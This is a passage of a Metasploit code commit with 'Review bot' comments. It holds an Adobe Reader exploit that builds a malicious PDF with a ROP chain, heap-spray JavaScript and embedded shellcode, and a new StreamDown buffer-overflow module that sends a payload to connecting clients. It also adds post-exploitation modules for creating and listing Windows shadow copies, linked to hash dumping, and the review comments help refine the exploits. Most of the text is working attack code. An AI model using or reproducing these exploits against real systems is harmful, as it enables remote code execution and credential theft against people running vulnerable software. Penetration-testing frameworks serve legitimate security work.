0x4a80aedc, # lea edx,[esp+0Ch] (edx => 0c0c0d94) / push edx {0c0c0d94} / push eax {Result of MapViewOfFile} / push dword ptr [esp+0Ch] ([0c0c0d8c] => 0x34) / push dword ptr [4a8a093c] ([4a8a093c] = 0x0) / call ecx (u 0x4a801064 => ret) / add esp, 10h / ret
0x4a801f90, # pop eax / ret
0x00000034, # becomes eax # mapped at 0c0c0d8c
0x4a80d585, # add eax, edx / ret (eax => 0c0c0dc8 => shellcode after ROP chain)
0x4a8063a5, # pop ecx / ret # mapped at 0c0c0d94
0x4a801064, # becomes ecx
0x4a842db2, # xchg eax,edi (edi becomes 0c0c0d8c, eax becomes Result of MapViewOfFile) / ret
0x4a802ab1, # pop ebx / ret
0x0000000a, # becomes ebx
0x4a80a8a6, # and dword ptr [esp+ebx*2],edi (esp+ebx*2 = 0c0c0dc0, edi = {shellcode after ROP chain} / jne 4a80a8ae [br=1] / cmp al,2Fh / je 4a80a8ab [br=0] / cmp al,41h / jl 4a80a8ba [br=1] / cmp al,61h / jl 4a80a8c8) [br=1] / xor al,al / ret
0x4a801f90, # pop eax / ret
0x4a849170, # becomes eax (import for MSVCR80!memcpy)
0x4a80b692, # jmp dword ptr [eax] {MSVCR80!memcpy}
0xffffffff, # ret for memcpy # mapped at 0c0c0db8 => Result of MapViewOfFile
0xffffffff, # dst (memcpy param) # mapped at 0c0c0dbc => Result of MapViewOfFile
0xffffffff, # src (memcpy param) # mapped at 0c0c0dc0 => Address of shellcode after ROP chain
0x00001000 # length (memcpy param)
].flatten.pack('V*')
payload_buf = ''
payload_buf << stack_data
payload_buf << payload.encoded
escaped_payload = Rex::Text.to_unescape(payload_buf)
eip_ptr =
[
junk(3),
target.ret, # EIP
junk(7),
0x0c0c0c0c, # [eax+3Ch] => becomes ecx / [0x0c0c0c0c] = 0x0c0c0c0c / [0x0c0c0c0c+1Ch] = 4a806cef => stackpivot
junk(16),
].flatten.pack('V*')
escaped_eip = Rex::Text.to_unescape(eip_ptr)
js = <<-JS
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
function alloc(bytes) {
return padding.substr(0, (bytes - 6) / 2);
}
function spray_eip(esc_a) {
pointers_a = unescape(esc_a);
for (i = 0; i < 2000; i++) {
x[i] = alloc(0x8) + pointers_a;
y[i] = alloc(0x88) + pointers_a;
y[i] = alloc(0x88) + pointers_a;
y[i] = alloc(0x88) + pointers_a;
}
};
function spray_shellcode() {
bbb = unescape('#{escaped_payload}');
ccc = unescape("%u0c0c");
ccc += ccc;
while (ccc.length + 20 + 8 < (0x8000 + 0x8000)) ccc += ccc;
i1 = 0x0c0c - 0x24;
ddd = ccc.substring(0, i1 / 2);
ddd += bbb;
ddd += ccc;
i2 = 0x4000 + 0xc000;
eee = ddd.substring(0, i2 / 2);
for (; eee.length < 0x40000 + 0x40000;) eee += eee;
i3 = (0x1020 - 0x08) / 2;
fff = eee.substring(0, 0x80000 - i3);
ggg = new Array();
for (hhh = 0; hhh < 0x1e0 + 0x10; hhh++) ggg[hhh] = fff + "s";
}
padding = unescape("#{escaped_eip}");
while (padding.length < 0x10000)
padding = padding + padding;
spray_shellcode();
spray_eip('%u4141');
this.pageNum = 2;
JS
js = js.gsub(/^\t\t/,'')
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
u3d = make_u3d_stream
xml = make_xml_data
pdf = make_pdf(u3d, xml, js.to_s)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def make_xml_data
xml = %Q|<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<ed>kapa</ed>
<config xmclns="http://www.microsoft.org/schema/xci/2.6/">
<present>
<pdf>
<version>1</version>
<fjdklsajfodpsajfopjdsio>f</fjdklsajfodpsajfopjdsio>
<interactive>1</interactive>
</pdf>
</present>
</config>
<template xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet>
</pageSet>
</subform>
</template>
<template1 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet>
</pageSet>
</subform>
</template1>
<template2 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet>
</pageSet>
</subform>
</template2>
</xdp:xdp>|
xml = xml.gsub(/^\t\t/, '')
return xml
end
def u3d_pad(str, char="\x00")
len = str.length % 4
if (len > 0)
#puts "Adding %d pad bytes" % (4 - len)
return (char * (4 - len))
end
""
end
def u3d_string(str)
([str.length].pack('v') + str)
end
def make_u3d_stream()
#
# REFERENCE:
# http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%201st%20edition.pdf
# The File format consists of these blocks:
# [File Header Block][Declaration Block][Continuation Block]
# Each block consists of (padding is used to keep fields 32-bit aligned):
# [Block Type][Data Size][Metadata Size][Data][Data Padding][Meta Data][Meta Data Padding]
#
mc_name = u3d_string("CCCCBox01")
mr_name = u3d_string("Box01RX")
# build the U3D header (length will be patched in later)
hdr_data = [0,0].pack('n*') # version info
hdr_data << [0,0x24,0xa34,0,0x6a].pack('VVVVV') # 31337 was 0xa34
hdr = "U3D\x00"
hdr << [hdr_data.length,0].pack('VV')
hdr << hdr_data
parent_node_data =
"\x01\x00\x00\x00"+ # node count (1)
"\x00\x00"+ # name (empty)
# transform matrix
[0x813f,0,0,0,0,0x813f,0,0,0,0,0x813f,0,0x548a55c0,0xa2027cc2,0,0x813f].pack('N*')
model_node_data = ""
model_node_data << mc_name
model_node_data << parent_node_data
model_node_data << mr_name
model_node_data << [1].pack('V') # Model Visibility (Front visible)
model_node = [0xffffff22,model_node_data.length,0].pack('VVV')
#model_node = [0xffffff22,0x5e,0].pack('VVV')
model_node << model_node_data
bone_weight_data = ""
bone_weight_data << mc_name
bone_weight_data << [
1, # Chain index
1, # Bone Weight Attributes (for a mesh)
0x3162123b, # Inverse Quant
0x14, # Position Count
].pack('VVNV')
# Position List
bone_weight_data << [
# 1
1, # Bone Weight Count
3, # Bone Index (no Quantized Weight)
# 2
0x55550000, # Bone Weight Count
0x4c1df36e, # Bone Index
0x0200d002, # Quantized Weight
# 3
0x95000074, # Bone Weight Count
0x66ccc357, # Bone Index
0x00000000 # Quantized Weight
].pack('VVNNNNNN')
bone_weight = [0xffffff44,0x3a,0].pack('VVV')
# We hardcode the length to match the old file.. (TODO: test if necessary)
#bone_weight = [0xffffff44,bone_weight_data.length,0].pack('VVV')
bone_weight << bone_weight_data
new_objtype1_data =
"\x05\x00\x52\x52\x52\x52\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2\xdf\x2a"+
"\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x05\x00\x52\x52\x52\x52\x52\x01\x00"+
"\x00\x00\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00"
#new_objtype1 = [0xffffff16,0x38,0].pack('VVV')
new_objtype1 = [0xffffff16,new_objtype1_data.length,0].pack('VVV')
new_objtype1 << new_objtype1_data
shading_modifier_data = ""
shading_modifier_data << mc_name
shading_modifier_data <<
"\x02\x00\x00\x00\x00\x00\x00\x00\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x06\x00\x42\x6f\x02\x00\x00\x00"
#shading_modifier = [0xffffff45,0x23,0].pack('VVV')
shading_modifier = [0xffffff45,shading_modifier_data.length,0].pack('VVV')
shading_modifier << shading_modifier_data
new_objtype2_data =
"\x01\x00\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2"+
"\xdf\x2a\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x52\x01\x00\x00\x00"+
"\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00"
#new_objtype2 = [0xffffff16,0x30,0].pack('VVV')
new_objtype2 = [0xffffff16,new_objtype2_data.length,0].pack('VVV')
new_objtype2 << new_objtype2_data
nodemod_decl = ""
nodemod_decl << model_node
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << bone_weight
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << new_objtype1
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << shading_modifier
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << new_objtype2
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl <<
# another modifier chain?
"\x14\xff\xff\xff\xc0\x01\x00\x00\x00\x00\x00\x00"+
"\x07\x00\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00"+
"\x00\x00"+
# clod mesh generator (declaration)
"\x31\xff\xff\xff\x9b\x01\x00\x00\x00\x00\x00\x00\x07\x00\x42\x6f\x78\x30\x31\x52"+
"\x58\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x14\x00\x00\x00\x6c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x2c\x01\x00\x00\x2c\x01\x00\x00\x2c"+
"\x01\x00\x00\x87\x52\x0a\x3d\xa6\x05\x6f\x3b\xa6\x05\x6f\x3b\x4a\xf5\x2d\x3c\x4a\xf5\x2d"+
"\x3c\x66\x66\x66\x3f\x00\x00\x00\x3f\xf6\x28\x7c\x3f\x04\x00\x00\x00\x07\x00\x53\x63\x61"+
"\x70\x75\x6c\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x07\x00\x48\x75\x6d\x65\x72\x75\x73\x07\x00\x53\x63\x61\x70\x75\x6c\x61\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x55\x6c\x6e\x61\x07\x00\x48\x75"+
"\x6d\x65\x72\x75\x73\x00\x00\x00\x00\x00\x00\x20\x41\x00\x00\x00\x00\x00\x00\x20\x41\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"+
"\x00\x52\x61\x64\x69\x75\x73\x04\x00\x55\x6c\x6e\x61\x00\x00\x00\x00\x00\x00\x70\x41\x00"+
"\x00\x00\x00\x00\x00\x70\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
# clod mesh generator (progressive mesh cont)
"\x3c\xff\xff\xff\x6f\x01\x00\x00\x00\x00\x00\x00\x07\x00"+
"\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x00\x00\x00\x50\x02\x00\x00\x28\x01"+
"\x00\x00\x7f\x75\x2f\x2b\x00\x00\x20\x73\x00\x00\xc3\x05\x00\x00\x00\x00\x00\x00\x80\x02"+
"\x45\xe4\x4c\x55\x01\x00\x00\xe0\x30\x03\x00\x00\xb0\x01\x00\x00\x00\x36\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x55\x55\x05\x00\x80\xa3\x2a\x00\xc0\xe1"+
"\x41\x6b\x92\xf2\xa4\x00\x00\x72\x87\x18\x4c\xd0\xda\x00\x00\x20\x46\xa9\x03\x00\x40\x8c"+
"\x00\x00\xa0\x7c\xa9\xa7\x10\x03\x00\x00\xc4\x09\x00\x00\x0d\xd2\x50\x85\x03\x72\x00\x80"+
"\x5c\x37\x19\xc1\xb9\x0f\x00\x20\x55\xf7\x13\x00\x40\x00\xdc\x1f\xf9\x2c\x35\x30\x6e\x06"+
"\x62\xb6\xea\x09\x2e\x7b\x28\xa4\x90\xe0\xb3\x63\x2c\x20\x92\x2a\x88\xbc\x06\x3a\xff\x80"+
"\x43\xb2\x00\x00\x00\x14\x62\x0e\x63\xb4\x04\x08\x47\x52\x20\x31\xca\x00\x00\xb4\x21\xe0"+
"\xd7\x01\x00\xa0\x1a\x72\x11\x71\xc2\x2c\x74\xc1\xa3\x56\xfa\x30\x03\x00\xe0\x7b\xd0\x62"+
"\x2a\x00\x40\x71\xfa\x6c\xc6\xcf\x07\x78\x81\xd0\x47\x3d\x58\x0e\x51\x0f\x2e\x27\x2d\xbe"+
"\x26\x10\x06\x6f\x3a\x40\xae\x36\x6a\x43\x60\xdf\xcb\xef\x8c\x38\xca\x04\x92\x79\x4b\x79"+
"\xe9\x42\xbd\x2b\xb9\x5b\x86\x60\x65\xa4\x75\x01\x19\xda\xcf\x6a\xf7\x2a\x77\x3c\xde\xf1"+
"\x11\x75\x33\xd3\x94\x74\x4a\x14\x73\x4b\x18\xa1\x66\xc2\x0f\xde\x3d\xed\x19\xd4\x32\x2e"+
"\xb6\x11\xf2\xc6\x2f\x13\x62\xb9\xe5\xe1\x03\x8b\xb5\x1c\x23\x9f\x80\x03\x75\xb6\x26\xd3"+
"\x1c\x16\x5f\x9b\x3c\xea\x62\x10\xe1\xb1\x00\x00\x00\x00"
# build the modifier chain
chain_data = ""
chain_data << mc_name
chain_data << [0].pack('V') # type (node modifier)
chain_data << [0].pack('V') # attributes (no bounding info)
chain_data << u3d_pad(chain_data)
chain_data << [0x5].pack('V') # number of modifiers
chain_data << nodemod_decl
#modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV') # chain_data was 0x17c bytes
modifier_chain = [0xffffff14,0x17c,0].pack('VVV')
modifier_chain << chain_data
data = ""
data << hdr
data << modifier_chain
data
end
def RandomNonASCIIString(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def ioDef(id)
"%d 0 obj\n" % id
end
def ioRef(id)
"%d 0 R" % id
end
def ASCIIHexWhitespaceEncode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(u3d_stream, xml, js_doc)
xref = []
eol = "\x0a"
obj_end = "" << eol << "endobj" << eol
# the header
pdf = "%PDF-1.7" << eol
# filename/comment
pdf << "%" << RandomNonASCIIString(4) << eol
email = rand_text_alpha(3) + "@" + rand_text_alpha(4) + ".com"
site = rand_text_alpha(5) + ".com"
xref << pdf.length
pdf << ioDef(1)
pdf << "<</Author (Fo)/email (#{email})/web (site)>>"
pdf << obj_end
compressed_xml = Zlib::Deflate.deflate(xml)
xref << pdf.length
pdf << ioDef(2)
pdf << "<</Length " << compressed_xml.length.to_s << " /Filter /FlateDecode>>" << eol
pdf << "stream" << eol
pdf << compressed_xml << eol
pdf << "endstream"
pdf << obj_end
xref << pdf.length
pdf << ioDef(3)
pdf << "<</XFA " << ioRef(2) << ">>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(4)
pdf << "<</Type/Catalog/Outlines " << ioRef(5)
pdf << " /Pages " << ioRef(6)
pdf << " /OpenAction " << ioRef(14)
pdf << " /AcroForm " << ioRef(3)
pdf << ">>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(5) << "<</Type/Outlines/Count 0>>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(6)
pdf << "<</Type/Pages/Count 3/Kids [%s %s %s]>>" % [ioRef(13), ioRef(9), ioRef(12)]
pdf << obj_end
data = "\x78\xda\xd3\x70\x4c\x04\x02\x4d\x85\x90\x2c\x00\x0f\xd3\x02\xf5"
compressed_data = Zlib::Deflate.deflate(data)
xref << pdf.length
pdf << ioDef(7)
pdf << "<</Length %s /Filter /FlateDecode>>" %compressed_data.length.to_s << eol
pdf << "stream" << eol
pdf << compressed_data << eol
pdf << "endstream"
pdf << obj_end
xref << pdf.length
pdf << ioDef(8)
pdf << "<</ProcSet [/PDF]>>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(9)
pdf << "<</Type/Page/Parent %s/MediaBox [0 0 640 480]/Contents %s/Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)]
pdf << obj_end
compressed_u3d = Zlib::Deflate::deflate(u3d_stream)
xref << pdf.length
pdf << ioDef(10)
pdf << "<</Type/3D/Subtype/U3D/Length %s /Filter/FlateDecode>>" %compressed_u3d.length.to_s << eol
pdf << "stream" << eol
pdf << compressed_u3d << eol
pdf << "endstream"
pdf << obj_end
xref << pdf.length
pdf << ioDef(11)
pdf << "<</Type/Annot/Subtype/3D/Contents (#{rand_text_alpha(4)})/3DI false/3DA <</A/PO/DIS/I>>"
pdf << "/Rect [0 0 640 480]/3DD %s /F 7>>" %ioRef(10)
pdf << obj_end
xref << pdf.length
pdf << ioDef(12)
pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s /Annots [%s]>>" % [ioRef(6), ioRef(7), ioRef(8), ioRef(11)]
pdf << obj_end
xref << pdf.length
pdf << ioDef(13)
pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)]
pdf << obj_end
xref << pdf.length
pdf << ioDef(14)
pdf << "<</S/JavaScript/JS %s>>" %ioRef(15)
pdf << obj_end
compressed_js = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc))
xref << pdf.length
pdf << ioDef(15)
pdf << "<</Length " << compressed_js.length.to_s << " /Filter [/FlateDecode/ASCIIHexDecode]>>"
pdf << "stream" << eol
pdf << compressed_js << eol
pdf << "endstream"
pdf << obj_end
# xrefs
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
# trailer
pdf << "trailer" << eol
pdf << "<</Size %d/Root " % (xref.length + 1) << ioRef(4) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end
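Review bot: in make_pdf the `site` value is computed and never used: `pdf << "<</Author (Fo)/email (#{email})/web (site)>>"` writes the literal word `site` while `site = rand_text_alpha(5) + ".com"` sits two lines above; either interpolate it as `/web (#{site})` or drop the variable. Two block lengths in make_u3d_stream are hard-coded with a TODO instead of derived: `bone_weight = [0xffffff44,0x3a,0].pack('VVV')` although bone_weight_data is 11 + 16 + 32 = 0x3b bytes, and `modifier_chain = [0xffffff14,0x17c,0].pack('VVV')` with the computed form commented out even though chain_data is visibly much longer than 0x17c once the clod mesh blobs are appended. If the wrong Data Size is what triggers the bug, the comment should say so; otherwise use the computed lengths and remove the TODO. Smaller points: object 15's dictionary is not followed by `eol` before `stream`, unlike every other stream object in the function; the `data` constant for object 7 already begins with a zlib header (`\x78\xda`) and is then deflated again, so /Contents decodes to a zlib stream rather than page operators, which deserves a comment if intentional; and each xref entry is emitted as 18 characters plus a single `\n`, whereas the PDF spec requires fixed 20-byte entries with a two-character EOL (`" \n"` or `"\r\n"`), so stricter readers may reject the table.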


@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'sup3r', #Initial disclosure, poc (9.5)
'sickn3ss', #9.6 poc
'sinn3r', #Metasploit
'mr_me', #NX bypass target
'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
'silent_dream', #Win 7 target
],
'References' =>


@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Jeremy Brown <0xjbrown41 [at] gmail.com>',
'Jeremy Brown <0xjbrown41[at]gmail.com>',
'loneferret',
],
'Version' => '$Revision$',


@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # original discovery & msf exploit
'TecR0c' # msf exploit
'mr_me <steventhomasseeley[at]gmail.com>', # original discovery & msf exploit
'TecR0c <roccogiovannicalvi[at]gmail.com>' # msf exploit
],
'Version' => '$Revision$',
'References' =>


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Paul Makowski <my.hndl [at] gmail.com>', # original version
'Paul Makowski <my.hndl[at]gmail.com>', # original version
'jduck' # various fixes, remove most hardcoded addresses
],
'License' => MSF_LICENSE,


@ -0,0 +1,77 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'StreamDown 6.8.0 Buffer overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception
handler is overwritten.
},
'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
'References' =>
[
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
['URL', 'http://secunia.com/advisories/47343/'],
['URL', 'http://www.exploit-db.com/exploits/18283/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0a"
},
'Platform' => 'win',
'Targets' =>
[
[
'StreamDown 6.8.0',
{
'Offset' => 16388,
'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll
}
],
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
end
def on_request_uri(cli,request)
vprint_status("#{cli.peerhost}:#{cli.peerport} requested: #{request.uri}")
# No point to continue if the client isn't what we interested in
ua = request.headers['User-Agent']
if ua !~ /CoCSoft Stream Download/i
print_error("Target not supported: #{ua}")
send_not_found(cli)
return
end
nseh = "\xeb\x06" + rand_text_alpha(2)
seh = [target.ret].pack('V')
offset_to_nseh = target['Offset']
nops = make_nops(10)
sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
cli.put(sploit)
close_client(cli)
end
end
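Review bot: the module metadata is missing 'DisclosureDate' and 'Version' => '$Revision$', and the file has no `# $Id$` header, all of which the other modules touched in this commit carry; the OSVDB, BID and Secunia references already listed give the date to fill in. The description has a typo and a missing space: "the server reponse packet.During the overflow" should read "the server response packet. During the overflow". In on_request_uri the buffer is written with `cli.put(sploit)` and the client closed without any HTTP status line or headers; if the client overflows on the raw socket data that is fine, but a one-line comment saying why send_response is not used would spare the next reader a trip to the PoC. `print_error("Target not supported: #{ua}")` fires on every non-matching request, including a browser poking the URL; vprint_status is the quieter choice there.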


@ -19,10 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job
Scheduler is implemented via the component extjob.exe which listens on a named pipe
called "orcljsex<SID>" and execute arbitrary commands received throw this channel via
CreateProcess(). In order to connect to the Named Pipe remotely SMB access is required.
This module has been tested on Oracle 10g Release 1 where the Oracle Job Scheduler
runs as SYSTEM on Windows but it's disabled by default.
called "orcljsex<SID>" and execute arbitrary commands received over this channel via
CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.
Note that the Job Scheduler is disabled in default installations.
},
'Author' =>
[
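Review bot: the sentence this hunk rewords still has a subject-verb mismatch in its unchanged part: "which listens on a named pipe called "orcljsex<SID>" and execute arbitrary commands" should be "and executes arbitrary commands". Since the hunk already edits the same sentence, fix that here as well.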
@ -40,6 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 2048,
},
'Platform' => 'win',
# This module has been tested on Oracle 10g Release 1
# where the Oracle Job Scheduler runs as SYSTEM on Windows
'Targets' => [['Automatic',{}]],
'Privileged' => true,
'DisclosureDate' => 'Jan 01 2007',
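Review bot: moving the "tested on Oracle 10g Release 1 where the Job Scheduler runs as SYSTEM" note out of the description and into a code comment above 'Targets' hides it from users, who only see the description through `info`. Keep a short form in the description (or in the 'Automatic' target name) so the tested version and the SYSTEM context stay visible; 'Privileged' => true on its own does not say which release was verified.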
@ -193,4 +194,4 @@ From ExecMain():
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)
=end
=end


@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Luigi Auriemma', # Original discovery and poc
'Celil UNUVER',
'TecR0c', # Module Metasploit
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
'sinn3r'
],
'References' =>


@ -23,7 +23,7 @@ module Metasploit3
'Name' => 'Generic x86 Debug Trap',
'Version' => '$Revision$',
'Description' => 'Generate a debug trap in the target process',
'Author' => 'robert <robertmetasploit [at] gmail.com>',
'Author' => 'robert <robertmetasploit[at]gmail.com>',
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,


@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' => [ 'Brandon Perry' ],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))


@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
'Name' => 'Windows Gather Product Key',
'Description' => %q{ This module will enumerate the OS license key },
'License' => MSF_LICENSE,
'Author' => [ 'Brandon Perry'],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]


@ -0,0 +1,69 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Create Shadow Copy",
'Description' => %q{
This module will attempt to create a new volume shadow copy.
This is based on the VSSOwn Script originally posted by
Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
register_options(
[
OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\'])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
id = create_shadowcopy(datastore['VOLUME'])
if id
print_good "Shadow Copy #{id} created!"
end
end
end
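Review bot: the author string `'thelightcosine <thelightcosine[at]metasploit.com'` is missing its closing `>`; the same string is pasted into each of the new shadow copy modules, so fix it everywhere. The module has the `# $Id$` header but no 'Version' => '$Revision$' entry, which the other modules in this commit carry. In run, failure of create_shadowcopy is silent: when `id` is nil nothing at all is printed, so add a print_error in an else branch so the user can tell a failed copy from a quiet success.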


@ -0,0 +1,83 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage List Shadow Copies",
'Description' => %q{
This module will attempt to list any Volume Shadow Copies
on the system. This is based on the VSSOwn Script
originally posted by Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
list = ""
shadow_copies = vss_list
unless shadow_copies.empty?
shadow_copies.each do |copy|
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Shadow Copy Data',
'Indent' => 1,
'Columns' => ['Field', 'Value']
)
copy.each_pair{|k,v| tbl << [k,v]}
list << " #{tbl.to_s} \n\n"
print_good tbl.to_s
end
store_loot(
